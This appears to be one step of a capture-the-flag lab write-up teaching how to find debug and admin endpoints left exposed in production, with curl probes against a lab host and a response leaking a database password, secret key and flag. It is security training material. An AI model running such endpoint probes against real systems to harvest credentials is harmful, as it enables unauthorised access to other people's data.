Many frameworks expose debug or admin endpoints by default that developers forget to disable before going live. Try common paths.
Command / Input
curl http://target.lab/debug
curl http://target.lab/console
curl http://target.lab/admin
curl http://target.lab/env
curl http://target.lab/config
Output
GET /debug → 200 OK
{"debug":true,"environment":"production","DB_PASSWORD":"hunter2","SECRET_KEY":"dev-secret-123","FLAG":"HackrGG{m1sc0nf1g_3xp0s3d_s3cr3ts}"}
⚑ Debug mode was left on in production. The /debug endpoint dumps the entire application environment including secrets.